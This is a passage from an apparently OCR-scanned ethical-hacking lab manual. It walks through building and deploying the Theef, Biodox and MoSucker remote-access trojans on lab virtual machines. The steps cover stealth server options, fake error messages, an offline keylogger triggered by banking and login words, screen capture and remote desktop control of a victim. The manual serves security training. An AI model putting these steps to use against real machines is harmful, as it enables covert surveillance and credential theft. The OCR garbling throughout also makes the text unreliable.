Po r t

6 70 3

FTP

2 96 8

Disconnect

[15:05:31] Attempting connection with 10.0.0.13 [15:05:31] Connection established with 10.0.0.13 [15:05:31] Connection accept ed [15:05:31] [15:05:31] Connected to to transfer port

A

%

•Qj SY

&

Connected to server

FIGURE 8.7: 7: Theef Gained access of Victim Machine Machine

11. 11. To view die compu co mputer ter information, click die Computer icon at die bottom of die window. window. 12. 111 Comp uter Information, you are able to view PC Details. OS Info, Home, and Network by clicking on die respective resp ective buttons. butto ns.




Computer Information Information

Reply PCDetails received

FIGURE 8.8: 8: Theef Compute! Compute! Information

13. 13. Click die Spy icon to capture screens, keyloggers, etc. of die victim’s machine. p r T Ti Tie ef ef v .2 .2 .1 .1 0 Computer Information Information User name: Administrator Computer name: WIN-EGBHISG14L0 Registered organisation: Microsoft Registered Registered owner: Microsoft Workgroup: [Unknown] A va il ab le mem or y: 56 5 Mb o f 10 22 Mb Processor: Genuinelntel Inte64 Family 6 Model 42 Stepping 7 (3095 Mhz) Display res: 800 x 600 Printer: [Unknown] Hard drives: C:\ (6,186 Mb of 16,381 16,381 Mb free)

PC Det ai ai ls ls

<#] OS OS In In fo fo

^ 5 Ho m e

Network

FIGURE 8. 8.9: 9: Theef Spy

14. Select Keylogger to record die keystrokes ol die victim. 15. 111 the th e Keylogger window, click click die Play butto bu ttonn to recor r ecordd the th e keystrokes.




Keylogger [Started]

cv

*j

FIGURE 8.9: Theef Keyloggei Window

16. 16. N ow go to Windows Server Server 2008 and type some text 111 Notepad to record die keystrokes. Keylogger [Started]

[New Text Document.txt - Notepad] HiBob{BACKSRACE}{BACKSPACE}{BACKSPACE} Billy U have been been hacked by the world wor ld famouse f amouse {BACKSPACE} hacker.j[CTRL}{CTRL}{ALT}

*51 tv

©

FIGURE 8.1 8.10: 0: Theef Thee f recorded Key Strokes Strokes

17 17.. Similar Similarly, ly, you can access die details o f die victim’ victim ’s machine by b y clicking clicking die respective icons.

Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s target’s security security posture postu re and exposure diroug d iroug h public and free information.




P L E A S E TA L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B.

T o o l /U /U t il ilit y

I n fo fo rm rm a ti ti o n C o ll l l e ct c t ed e d /O / O b j ec e c ti t i v e s A c hi h i e ve ve d

Output: Theef

Victims machine PC Information Victims machine keystorkes

Questions 1. Is there any way to fal falte terr out ou t the "localhost:# # # # " remote address entrie entries? s? 2. Evaluate the other details details displayed displayed by “autoruns” “auto runs” and analyze analyze the working of the autonins too tool. l. Internet Connection Required

□ Y es

0 No



0 !Labs



Creat Creating ing a Server Serv er Using the th e Biodox T heef he ef is a W indons based applicationfor app licationfor both both the the client client and server end. end. The Theef Th eef server is a vim v imss that yon install insta ll on on your you r victi victims ms coup!iter, and a nd the The T heef ef client in nhat yon then use to control the virus. ICON

KEY

/' Valuable information Test your knowledge — Web exercise exercise

ca

W orkbook review review

Lab Scenario You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuab valuable le data from the network, and identity theft. theft.

Lab Objectives The objective objective of tins tins lab is is to help students learn to detect Trojan and backdo or attacks. The objectives of the lab include: Creating a server and testing the network tor attack Detecting Trojans and backdoors ■


Attacking a netw ork using sample Trojan s and docum enting all all vulnerabilities and flaws detected

Lab Environment To earn tins out, you need: need:

Biodox tool located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backd oors\Trojans Types\GUI Types\GUI Trojans\Biodox Troja Trojan n

■

A com puter runn running ing Windows Server Server 2012 as H ost os t Machine A computer running Window Server 8 Virtual Machine (Attacker) Windows Server 2008

running 111 Virtual Machine Machin e (Victim) (Victim)

A web browser with Internet access Administrative privile privileges ges to nm n m tools


Etliical H ack ing and C ounterm easures Copyrig Copyright ht © by EC-Cou EC-Council ncil All Rights Reserved. Reproduction is Stricdy Prohibited.



Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as mining die file allocation table on a hard dnve. The versions versions of die created created client client or h ost an d appearance of die website may differ from what it is 111 die lab, but die actual process of creating die server and die client is same as shown 111 diis lab. Note:

Lab Task Task s m TASK

1

Create Server with Pro Rat

1. Launch Windows 8 Virtual Virtual Machine and navigate navigate to Z:\CEHv8 Module 06 Trojans and Backd oors\Tro jans Types\GUI Types\GUI Trojans\Biodox Trojan. Trojan.

2. Double-click machine. r

w

BIODO BIODOX X OE Edition .e x e

Ap p licato r t o o k

'

I

1

Hom e

-* )

0

t

to mn die Trojan on die victim’s

S ha ic «

Vie vr

Biodox

M a nage

, ,, n sTy p cs

v

► GUITro GUITr o jan jan s ► Bo co x Tio jen ► Bio d ox ox

v | C, | | Se arch Biodox

© *

.

Jl. Lan g u ag e

Favorites

Pbgns

W Desktop

£. Downloads

; 3 BI3COX CE Edition.e
R Recen ecen t p laces

& MSCOMCTL.OCX

j* MSW1NSOC OCX

39 Libraries Libraries H) Do cu men t?

B

A res.qf g

Music

sewing sewing s.in s.in i

P ic ic t ur ur e s

|§j Videos

FIGURE 9.1: Windows 8-Biodox Contents

3. 111 the Open File - Sec urity Warning Warning window, click Run. as shown in following screenshot. Open File Security Warning The publisher could not be ve verified. rified. Are you sure you want to run this software? Name:

...I ...I Tro jans\B iodox Trojan \Biodo x\BIO DOX OE Edition.exe

Publisher

Unknow n P Publisher ublisher

Type:

Application

From:

Z:\CEHv8 Mod ule 06 Trojans and Backdoors\Trojans T... T...

Run

Cancel

This file does no t have a valid digital signa ture that verifies verifies its publisher. publisher. You sho uld only run software from publishers you trust. trust. How can I decide what software software to run?

FIGURE FIGUR E 9.2 9.2:: Windows 8-Security W Warning arning




4. Select Select yourpreferred language language from die drop-dow drop- dow n list list in die Biodox main window: 111 diis lab we have selected English. Biodox Open Source Edition

£ 3 commun A passwor

man ag e keyboar msn sett

Og settings ________ information 0 system information (5 1 ; fin man ag er y commands f 1 cap tu re server properties local tools |w co n tact u s

Co rrectio rr ectio n

Poet

f f Cermet Cermet tkn

6061 6061

g T r a ns ns f er er

6 6 62 62

Bs
6663

5

6 6 64 64

W e bC bC a m

ua

User Name

Computer ...

Admin

Coded By Who! | w h o @ t i k k y s o f t . c o m

Sta tus : Ready...

--------

>

--

-

FIG URE 9.3: 9.3: Windows 8-Biodox main window language language selection

5. No w clic click k die Server Editor butto bu ttonn to build a server as shown sho wn 111 die following screenshot. Biodox Open Source Edition

□ . -----------

- Fake Error Message

00

3 commenfcaton £ passwords manage fifes keyboard

$ settings manage' systenr systenr r 1fo m a o x 1

Adress:

| Test Message

|

Message Icon :

©

O

r Victim Na

fin mwaoff gp> commands

Name:

\J^ capture 5j strver nropprtiet

Connection; | 6 6 6 1

[ Connection connection Delay

QUvf^l

local tools M contact us

| Screen Capture;

Tran sf s fer: er:|666? |666?

| webcam Capture:

O Windowo n dowo

O Temp Temp

|6663

|6664

|

|

c#< . for conrwtioi

-Regetry Settings K*y: mssrs:

Correction

Error*

| biodox biodox wa s here

IP/[*S-

5 P msn settjnos

; Msg Title

0

S yy8 8 te te m 32 32

Server Mode (•> Gizli Mod

O Yardyrr Yardyrr Moou Moou

s

Px t

*3 Connection

6561

S Tran sfer s fer

6562

?? Screen

6563

5 W e bC bC a m

6 5 64 64 Admin

| Operatin ... | Cpu

Status : Read/...

| Ram

Coentry Coentry

active / deactive deactive status

FIGURE 9.4: Windows 8-Security Warning

6.


111 Server Editor options, enter a victim’s IP address in die IP/DNS field; in diis lab we are using Windows Server 200 8 (10.0.0.13). Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.


7. Leave die rest of die settings at dieir defanltd; to build a server click click die butt on. Create Server button. Note:

IP addresses may ditter 111 your classroom labs. labs. Biodox Open Source Edition | H

Server Editor

7

p a ss ss wo wo rd rd s manage files files keyboard

-IP/DfsS -IP/Dfs S -------

msn settings settings maTage s ys ys te te nn- 1 nfo mato n

^

----------

□ 0 0

!13 commuucaton £

Adr ess:

110.0.0 13|

Na m e:

|v ictim

Msg Title :

|ErfQH

Message :

|biodox w as here

I

Message Icon :

©

■» f i r m a n a g er er commands capture

2 j se rve r prop ert ies

Connectio n:

Delay — 1- Connection Delay

[666 [66611

| Screen Ca ptu re:

Tran sf s fer: er:|6662 |6662

| webcam Capture:

O

O

-Registry Settings

Windows

0

Temp

Key :

mss mssrrs3 s3 2

Vak je:

mssr mss rs3 s3 2 .ex e

O Yardyn Yardyn MoCu

Port

? 5 C on on ne ne ct ct io io n

6 56 56 1

® Tr Tra n sf e r

65 6 2

?? Screen

6563

S W eb eb C am am

6564

5 y st st e m 32 32

■Server Mode © Gizli Gizli Mod

Vetim Marne

|

|

Dday|i0n **C

■*f k>:al tools ' ) contact us

Correction

[6663 [6663

[6664

0

J_U£J

IP Adress

UserN arre

Compute r...

Admin

Operati n...

Cpu

Status : Ready...

Ram

Coui try

create server

FIGURE 9.5: Bodox Main Screen

Server.exe

tile will be created 111 its default directory: Z:\CEHv8 Module 06

Trojans and Backd oors\Tro jans Types\GUI Types\GUI Trojans\Biodox Trojan. Trojan. A p p l i c at at o r T oo oo ts ts

|

|

Ho Home

5 0 - ♦g

View

Share

« Tr cjans Types ►

GUITrojons ►

"S’ © D-odox Trojcn ►

Biodox

v|C |

| Scorch Scorch Biodox Biodox

J4 Language

-Z Favorites E

Bi od ox

Manage

M P l j 9

D e sk sk t op op

t

BIOCOX Cb fcd!t 10 n.e
4 Downloads

j p U in w

‘k\l Recent places

MSCOMCTL.OCX gMS\A1NSCK.0CX

Libraries 0

£ 1 e s . g f

D o cu cu m en en ts ts

J'' Music B

P ic ic tu tu re re s

0

V id id eo eo s

p i/ [ server.ex server.exe") e") ft 5ertingj.ini -

FIGURE 9.5: Bodox services

9. No w switch to Windows Server 2008 2008 Virtual Virtual Machine, and navigate navigate to Z:\CEHv8 Module

06

Trojans\Biodox Trojan Trojan


Trojans

and

Backdoors\Trojans

Types\GUI

to mil die server.exe tile.



’ r 0)or» "ypea - GUI Trojon* - 3 odo
edit

ools

/1eA

C rg»m :e ~

»

a

I*I

tnodfi«d

I*I Typ*

Ms.. I•I

I i^Ptugns

D o cu cu n cn cn t s

%1 Pictu-es

4 Ib 1 X O ^ O r & 4 t o r . e t e

R j Music

p

More

&

(__ O pen

Fa/orite Links

f

i tt tt J i F -

ie p

Leetre Leetre

<£ m 5c <* c t .. o c x

»

MSWINSCK.C O

i^serangs.r

i. . . . ^

.*jm-r.

3iodo!c Trojan J. Botox JA Language J4 Pogne

FIGURE 9.6: Bodox server.exe

10. Double-click server.exe 111 Windows Server 2008 virtual macliine, and click Run 111 die Open File - Se cur ity Warning Warning dialog box. Open File File - Security Warning The publisher could not be verified. Are you sure you want want to run this software?

E

Name: .. .pes\GUI Trojans'B iodox Tr0jatVf310d0x\server.exe Tr0jatVf310d0x\server.exe Publisher: Type:

U n k n o w n P u b l i s h er er

Application

From: From: Z:\CEHv8 Module Module 06Troja ns and Backdoors Backdoors \Troja n...

Run

•

tgV

Cancel

This This file file does does not have a valid valid dig digit ital al signa signatur ture e that veri verifi fies es its its publisher. You should only run software from publishers you trust. How can I decide what software to run*

FIGURE 9. 9.7: 7: Run the tool

11. 11. No w switch to Window s 8 Virtual Macliine Macliine and click die active/deactive bu ttonn to see die con connec nected ted machines. s t a t u s butto




Biodox Open Source Edition Server Editor

□ ■------------

-Fake Error Message Message —

□Q S

r S commcnicaton

pas swo rds manage ftes

j keyboard keyboard fla msn settjn os os settings ma-iage O s y st st e m n f o matr>n

Adress:

Msg TlUc ;

|br- or

Messa ge:

[biodox [biodox w

Message Icon :

10.0.013

- Vctim Vctim flame

.#.• finmanaoer jj commands [_jj capture

N am am e :

properties 3 server properties

Ivic

Connec tion: [6661 [6661

r co n n ectio ect ectiioo n D elay -

DâyjiOI

A local tools

1ee.

“\) contact us

| webcam Capture:

O

O

|6663

|6664

|

|

connectioi

-R -Reg eg etr etry y Sewin g sKey:

| Sae en Cap tjre :

Tran sf s fer: er:|66s? |66s?

mssrs:

Windows

0

Temp

S y st st e m 32 32

•serv er Mo M o d e© Gizli Gizli Mod

O Yardyrr Yardyrr Mocu Mocu

Pxt

Connection

S Co n nectio nectionn

6561

Transfer

6962

® Saeen ® Web Cam Cam

6 5 63 63 6564

Vctom Vctom Name

IP Adress

User Narre

Con>putcr...

Admin

Operatin ...

Cpu

Ram

S t a t u s : S e t t i n g s s a v e d a n d s e r v e r c r e a te te d (

Coentry

active / deac tive status

FIGURE 9.8: Bodox open source editior

12. 12. After getting connected connec ted you can view view connected connecte d victims victims as shown 111 die following screenshot. Biodox Open Source Edition

(D0I

----------

0 0

3 c o m mc mc n ic ic a to to n 2 ' pas swo rds manage fles keyboard

O

msn settinos settings maTage s y s te te r r n ft ft y m a t o n

Adress:

10.0.013

Msg Titl e:

[Errofl

Message :

|biodox wa s here

Message Icon ;

©

V

Co n n ectio n : |66 |66 6 1

| Saee n C Cap ap tu re:

-----

*fl'• fin manager commands | j | c a p tu tu r e ijj server prop»rt prop»rt1 »c

r Connection Delay —

local tools

o«l»y | 1 0

^}) contact us

|

fer

Tran sf s fer: er:[6662 [6662

mss mssrrs3 s3 2

| webcam Capture:

|6 6 6 3

|6€€4

|

|

- Install Install Pa th ------------------------

O Key :

|

Windowo

O

Temp

r Serv er Mo d eO Yordyro Yordyro Modu

:

:onrertcn

S Co n nectio nectionn H Tran sfer sfer

6561

J/D

I

6562

Saeen

6 5 63 63

S Web Cam Cam

6564

altltemfc

mssrs32e:

___ CaniButfir... __ __ c pu . IP Adress______Ussi Adress______Ussi Marcs __ Admin _____ Qpsratin... __ __ Admin Adrrinistr... WIN-EGB.. Win Vista 3D93

0.99 GB

United .

Status :dien t Active

FIGURE 9.9: Bodox open source editior

13. 13. N ow you can perform perf orm actions with die victim by selec selecting ting die appropriate action tab in die left pane of die Biodox window. 14 14.. N ow click the settings manager opdo n to view the applicat applications ions running and odie r application settings. settings. CEH L ab Manual Page 503 503



Biodox Open Source Edition

@ 01

c ommuiicaton rS commuiicaton

Name

PID

Path

Memory ...

S I (system pr...

0

System

0

A passwords

H*J cy tttm

4

System

0

ms msn n ag s fles

j keyboard fla ms msn n settmas s ettmas 9 s e t titi n gs gs m a T ag ag y 1 a p jljl ic ic a to to n s ~ | 1A

ap ^îcato icato n setb s etb n o s £ ex3lore s e t i n g s C3 pmt ^ s e rv rv i ce ce s 0 s ys ys te te m information .$• fun manager

23smss.exe

432

System

92 9 7 9 2

Norm al

H 3 c s rs s .e x e

5 00 544

Sy ste m

5 7 0 16 32

Norm al

Sy s te m

7 4 3 0 14 4

Not riria l

H•!! wmm1 t.e>e

552

Sy ste m

4849664

Hiob

L.-J .vinlogon .vinlogon ex e

5 80

Sy ste m

62 8 7 3 60

High

)ser v ces ces.ex .ex e 1 1 )serv

628

System

7 1 88 48 0

Norm al

I Q k a s s . ex ex e

640

System

1 0088 2211 6633 2

Norm al al

5llsm.exe

648

System

48 1 2 8 00

Norm al

i y s vvcc ho ho st st .e .e x e

8 3366

Sy ste m

6418432

Normal

1 3 s v c f o s t .e x e

89 6

Sy ste m

7 19 2 5 7 6

Norm al

s v c h o s t .e x e

99 2

Sy ste m

99 6 5 5 68

Norm al

1015

Sy ste m

7 01 6 4 4 8

Norm al

244

Sy ste m

3 31 81 69 5

Norm al

296

Sy ste m

125 62432

Norm al

360

Sy ste m

120 91392

Norm al

csrss.exe

jj1 comm ands ^ c a pt pt ur ur e j se rve r pro pe roe ;

iij)ssv v ch o st.ex s t.ex e

A !oral tools

ii J d s v c .e x e

W) contact us Connection

Priority

s v c h o s t .e x e s v c h o s t .e x e

a

0 H B 0 -------- 1

□ v

1*1 !

Pxt

5 Co n nectio nectionn

6561

Transfer

6962

® Screen

6563

® Web Cam Cam

6564 ? Adress

User Narre

Com puter...

Admin Admin

Admmstr...

WIN-EGB...

True

Opera tin...

Cpu

Status : successfully ly

0.99 GB

United...

Clear Application List

FIGURE 9.9: Boclox open source editor

15. 15. You can also record die screenshots o f die victim victim by clicking clicking die Screen butt on. Capture button. 16. 16. Click die Start Screen Capture butto bu tton n to t o capture captur e screenshots screen shots o f die victim’ victim ’s machine.

FIGURE 9.10: screen capmre

17. 17. Biodox display displayss the captured screenshot screensho t o f the victim’s victim’s machine. machine.




V 41 41 *

*

**

Saeen Capture

V

x

Rctydean

9

'V.H51

SL B

Nr* Te*t Doarvw.txr

FIGURE 9.11: screen capture

18 18.. Similar Similarly, ly, you can ca n access die details o f die victim’ victim ’s machine by b y clicking die respective functions.

Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s security posmre and exposure dirough public and tree information.

P L E A S E TA L K T O Y O U R I N S T R U C T O R R E L A T E D T O T H I S L A B.

T o o l/ l/ U t il il i t y B io d o x

IF YOU HAVE QUEST IONS

I n fo fo rm rm a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed O u tp u t : Record the screenshots o f the victim machine

Internet Conn ection ection R equired □ Y es

0 No

Platform Supported 0 C l as as s ro ro o m


0 !Labs

Ethica l Ha ckin g and Cou ntenn easures Copyrigh Copyrightt © by EC-Council EC-Council AH Rights Reserved. Rep roduction is Stricdy Prohibited.


Creat Creating ing a Server Serv er Using the th e MoSucker MoSucker M oSucker is a V isual isu al Basic Troja Trojan. n. M 0Snke/Js 0Snke/Js edit edit server serverprogr program am has a clie client nt )rit )rith h the the sam samee layo layout ut as suhSev suhSeven' en's clie client nt..

Lab Scenario

ICON KEY [£Z7 Valuable information______ .y v Test vour _______ _ knowledge ______ **

We b exercise exercise

W orkbook review review

A backdoo r is a secret secret or unautho rized channel fo r accessing accessing comp uter system. system. 111 an attack scenario, hackers install backdoors 011 a machine, once compromised, to access it 111 an easier manner at later times. With the growing use of e-commerce, web applications have become the target of choice for attackers. With a backdoor, an attacker can virtually have full and undetected access to your application for a long time. It is critical to understand the ways back ba ckdo do or orss can be installe ins talledd and an d to take req uired uir ed pr prev even entiv tivee steps. You are a security security administrator o f your company, and your job responsibili responsibilities ties include protecting the network from Trojans and backdoors, Trojan attacks, theft ot valuable data Jtrom the network, and identity theft.

Lab Objectives The objective of this lab lab iiss to help students learn to detect Trojan and backdo or attacks. Tlie objectives of the lab include: I T T o ol ol s demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors

■


■


■

Attacking a netw ork using sample Trojans and docum enting all all vulnerabilities and flaws detected

Lab Environment To carry tins tins out, you need: need:

MoSucker tool located at D:\CEH-T 00 ls\CEHv 8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker

A computer running Windows Server 2012 as host machine CEH L ab Manual Page 506 506

Etliical Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.


■

A com puter running Window Server 8 Virtual Machine (Attacker) Windows Server 200 8

running 111 Virtual Machine (Victim)

■

A web browser with Internet access

■

Administrative Admin istrative privileges privileges to mil mi l tools


Ov erview of Trojans Trojans and and Backdoors A Trojan is a program diat contains malicious or harmful code inside apparendy harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die file allocation table on a hard drive. The versions of die created client or host and appearance of die website may differ from what it is in die lab, but die actual process of creating die server and die client is same as shown 111 diis lab. Note:

Lab Task Task s 3

t a s k 11. Launch Laun ch Windows Window s 8 Virtual Machine and navigate navigate to Z:\CEHv8 Module 06

_ Create Server with ProRat 2.

Trojans and Backd oors\Tro jans Types\GUI Types\GUI Trojans\MoSucker.

Double-click die CreateServer.exe file to create a server. F

- p

MoSucker

Applicator Tools Tools

i

Home

|

Sh

View Trcjans Types

* _ -< Favorites Desktop f t D o w n l oa oa d s '2Al Recent place}

Manage ►

GUI GUI Trojans ►

“

© MoSuckcr

V | < | | Scorch MoSuckcr

fi

|

J! AY Firewa Firewall ll e/en ts Jtcgi Jl. pi jg ns j . r unti mK screenshots

04 Libraries Q

D o c um um e n ts ts

^ Music M

P i ct ct ur ur e s

Qj Vid»oc lOiterrc

J i slons j . st ub | ^Cfea?eServer.exe | MjSjcLcr exe j_] R eadM e.tx t

1 it*m cel»rt#d 456 K2

FIGURE 10.1: Install createServer.exe

3. 11 111 the th e Open File - S ecu rity Warning click Run. Warning dialog box, click




Open File Security Warning The publisher could could no nott be v e erified. rified. Are you sure you want to ru run n this software? Name:

S3

...Trojans Types\GUI Trojans\MoS ucker\CreateServer.exe

Publisher

Unkn own P Publisher ublisher

Type:

Application

From:

Z:\CEHv8 Mod ule 06 Trojans Trojans and BackdoorsVTrojans BackdoorsVTrojans T... T...

Run

Cancel

This file does n ot have a valid dig ital signature that verifies its publisher. publisher. You sh ould only run software from publishers you trust. trust. How can I decide what software software to run? run?


£ / T oo oo ls ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors

4. The MoSncker Server Creator/Editor window appears, leave die default settings and click OK. OK. MoSucker 3.0 Server Creator/Editor Coded by Superchachi. Contains code from Mosucker 2.2 by Krusty Compiled for Public release B on November 20/2002, VB6 (•

m

I want to create a stealth trojan server for a victim I-

CD

Indude Msvbvm60.dll in in your MoSucker MoSucker server (adds 750 KB) KB)

17 I ndude mswinsock.o cx in your server (adds 50 KB) 17 Pack for minimal file size

Recommended!

CD CD

MoSudcer MoSudcer Transport Cipher Key TWQPQJL25873IVFCSJQK13761 V Add

(

|

2385

KB to the serv er.

I want to create a visible server for local testing. I want to edit an existing server

17

Start configuration after creating creating the server

About

Cancel

Ok


5. Use die file file name server.exe and to save it 111 die same directory, click Save.




&

MoSucker Server Creator.

©

^

0 Organize w 0

[

«

GU GU I T r o ja ja n s ►

M o S u c ke ke r

Search MoSucker

New folder

*

D o c um um e n ts ts

J 1 Music

Name i.

Pictures

8 Videos

A V Fi Fi r e wa wa l l e v e n t s

Date modified

Type

9/19/2012 1:37 PM

File foldei

Xcgi

9/19/20121:37 PM

F i le le f o l d e i

J

plugins

9/19/2012 1:37 PM

File foldei

X

r u nt nt im im e s

9/19/20121:37 PM

File folde i

J.

s c r e e n s h o ts ts

10/1/2012 6:56 PM

F i le le f o l d e i

9/19/2012 1:37 PM

File folde i

Homegroup

X- skins :

Computer J ^ V

^

L o ca ca l D is is k ( C )

stub

File folde i

11/28/2002 2:59 AM

Applicatia

jg | M 0 Sucker.exe

1 1 / 2 2 / 2 0 0 2 5 : 1 0 PM PM

Applicatifl

C E H -T -T o ol ol s ( \ \1 \1 0 .

N et et wo wo rk rk

File QameJ Save as typ e

“

10/1/2012 6:50 PM

J p CreateServer.exe

5 E x e c u t a b l e F i l e s ( * . ex ex e )

Save

Hide Folders

Cancel

FIGURE 10.4: Save Server.exe

6. MoSucker will will generate a server with the com plete settings settings in die default directory. MoSucker 3.0

G e n e r a t i n g s e r v e r ... 100% complete Build Date: Build Build Info:

11/28/2002 2:04:12 AM MoSucker 3.0 Public Release B

L e v e l A c c e s s e d : Public UPX Verifying necessary filepaths Preparing first stub Preparing second stub Packing first stub Packing second stub Modifying file headers

FIGURE FIGU RE 10 10.5: .5: Install server progress

7. Click OK 111 die Edit Server pop-u po p-u p message. Edit Server 3.0 Server created succe ssfully! Server size: 158 KB. D o n o t r e p a c k s e rv rv e r .

OK

FIGURE 10.6: Server created successful

111 the MoSucker Mo Sucker wizard, change chan ge die VictinVs Name to Victim or leave all the settings as dieir defaults.




MoSucker 3.0 Selected Server: |2:VCEH |2:VCEHv8 v8 Modde 06 Trojans and Backdoors\Trojans Type [

NameA’ort Password

Server ID: Cypher Key:

[

Notificatio n 1

Victim's Victim's Name:

f

Notification 2

Server Name(s):

Options

Extension(s): Conrectior-Bort:

J
Close

0

1501704QWEYJC:4264200TPGND 4264200TPGNDEVC EVC TWQPCUL25873IVFCSJQK13761 TWQPCUL25873IVFCSJQ K13761 |vict!m

~]

0

kernel32,mscOnfig,winexec32, netconfig exe,pif,bat,dliope,com,bpq,xtr,txp, 142381

I * Prevent same same server multi-infections (recommended) (recommended)

You may select a windows icon to associate with your custom file extension/s.

Fake Error File Properties

Read

Save

FIGURE 10.7: Give die victim machine details

9. No w click click Keylogger 111 die left pane, and check die Enable off-line keylogger opdon, and dien click Save. 10 10.. Leave die rest o f die settings as dieir defaults. MoSucker 3.0 Selected Server: Name/Port Password

|z:\:\CEHv8Module 06 Trojans and Backdoors\Trojans Type P I !Enable !Enable off-line keyioggetj

[

C~\ Close

[T]

Log Filename: monitor.kig

Options

1 Enable Smart Logging Logging Captwn key words to trigger keylogger (separate each with a comma) hotmad,yahoo',login password,bankfsecurefcheckoutfregister,

Keylogger Plu g-n s^<11 Fake Error Fde Properties

Read

Save

FIGURE 10.8: Enable the keylogger

11. Click OK 111 die EditServer pop-up message. MoSucker EditServer 3.0

o

Server saved successfully. Final server size: 158 KB

OK

FIGURE FIGU RE 10 10.9: .9: Server save file file




12. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module

06

Trojans\MoSucker to

run die server.exe hie. 2 ^ Si H I

3 Pit

Edl

Vtew tew *

~odi

Trojans

and

BackdoorsVTrojans

-Jpj*1

•tep •tep

Virnt

i AVFrmsI AVFrmsI e\en3 e\en3

£ Pitres

©

*

■»-» - H Ii*co

favorite Links

Types\GUI

I- ■■°■

1• Ml *

v

|

âe

4. 1•

.1 — * ^viSvcce'.sxe

__ _ l _ ^

____________ ________ ________ _______ ___ I ^ ________ FIGURE FIGUR E 10.10: click server.exe

13. Double-click server.exe in Windows Server 2008 virtual machine, and click Run 111 die Open File - Se cur ity Warning Warning dialog box. x 11

Open File File - Security Warn ing The publisher could not be verif ied. Are you sure you want to run this software? Name: Publisher: Type:

.. .s\T 1rojans r ojans Types\GUI TrojansV 'loSucker'!server.exe 'loSucker'!server.exe U n k n o w n P u b l i s h er er Application

From: Z: \CEHv8 Module 06 Trojans and Backd oors\T 1rojan... r ojan...

Run

. f!

Cancel

This file does not have a valid digital digital signature that verifies its its publisher. You should only run software from publishers you trust. How can I decide what software to run

FIGURE FIGURE 10.11: Click on Run

14. 14. Now No w switch to Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and BackdoorsVTr BackdoorsVTrojans ojans Types\GUI Types\GUI Trojans\Mo Sucker

to launch MoSucker.exe. 15. Double-cl 1ckMoSucker.exe.




K

1

] © )

* (

Ib m c

Share

t l i i

*

View jnj Typca

Manage ►

GUITro janj

AY Frewa 1e/en ts

-{ Favorite K

MoSucker

Applicator t o o k

W

11

MoSucke r

v

C

fi |

| Scorc h M oSuckc r

-J! 5erver.exe

M c9

D e sk sk t op op

J

6 Downloads

pljg ns

1 runtime

ffil Rcccnt Rcccnt plot o

£ ^

^gi Libraries

s c re re t ns ns h oc oc s s l o ns ns stub

H] Documents

$ C rea:eServer.exe

Music [KJ Pictures

^ M o S u d e rp rp e ]

!HI Videos

j | Re adM e.M

11 items

►

1 item selerted 3.08 MB

£

5,

FIGURE FIGUR E 10 10.12: .12: click on Mosuker.exe Mosuker.exe

16. 16. 111 tlie O pe n File —Security —Security Warn Wa rning ing dialog dialo g box, click Run to launch MoSucker. Open File - Security Warning The publisher could not be verified. Are you sure you want want to run this software? Name:

S3

...rs\Tr ...rs\Trojan ojanss Types\GUI Types\GUI Trojans\MoSucker\MoSucker.exe Trojans\MoSucker\MoSucker.exe

Publisher:

Unknown Publisher

Type:

Application

From:

Z:\CEHv8 Modu le 06 Trojans and Backdoors\Trojans T.. T....

Run

Cancel

This file does n ot have a valid dig ital signature that verifies its publisher. publisher. You sh ould only run software from publishers you trust. trust. How can I decide what software software to run? run?

FIGURE 10.13: Run the applicatin

17. 17. Tlie MoSucker main window appears, as shown 111 die following figure.

10.0.012

][10005

Misc stuff Infotmation File related System

J

Spy related Fun stuff I Fun stuff II Live capture

u i iu i u u i .m .m o s u c h c r . t K

*

0G

FIGURE FIGU RE 10 10.14 .14:: Mosucher main window




18. Enter the IP address of die victim victim and port numb er as you noted at die time o f server configuration, and dien die n click Connect. 19 19.. 111 diis lab, we have noted not ed Windows Win dows Server 2008 virtual machine’ machin e’ss IP address (10.0.0.13) and port number: 4288. Note:

These might differ 111 your classroom labs.

FIGURE 10.15: connect to victim machine

20. Now die Connect butto bu tton n automatically auto matically turns to Disconnect after getting connected widi die victim machine as shown 111 the following screenshot.

version 3.0

FIGURE 10.16: connection established

21. Now click Misc stuff 111 die left pane, which shows different options from which an attacker can use to perform perf orm actions from liis or her system. system.




' About

_

|

I& T o o ls ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors

FIGURE FIGU RE 10 10.17 .17:: setting setti ng server options

22. You Yo u can also access the victim’ victim ’s machine remotely remo tely by clicking clicking Live Live cap ture in the left pane. 23. 111the Live optio n click Start, which will will open the remote desktop Live captur e option of a victim’s machine. About'

| 4288 11 11 Disconnect 11 Options Options ] s g JI&

Misc stuff

_

~x]

Q

make screenshot

Information File related System Spy related

Make screenshot JPEG Quality:

Fun stuff I

*

Fun stuff II

• 30% • 40% • 50%

Live capture Start Settings

20%

•

60%

•

70%

•

80%

O 90%

& oi£ FIGURE 10.18: start capturing

24. 24. The remote re mote desk top connection conne ction ot die victim’s victim’s machine is shown show n 111 die following tigiire. tigiire.




Remote administration mode

îaijol

sssei sssa&i RA mode options Resi 2 e windo-v to 4:3 JPG Qu Quality 1 Delay in ms |

' 1000

W Send mouseclicks W Send pressed keys Send mousemoves

U

W Autollpdate pics V Fullscreen

FIGURE FIGU RE 10 10.19 .19:: capturing capturi ng victim machine

25. You Yo u can access tiles, tiles, modify modif y die files, files, and so on in diis mode. *

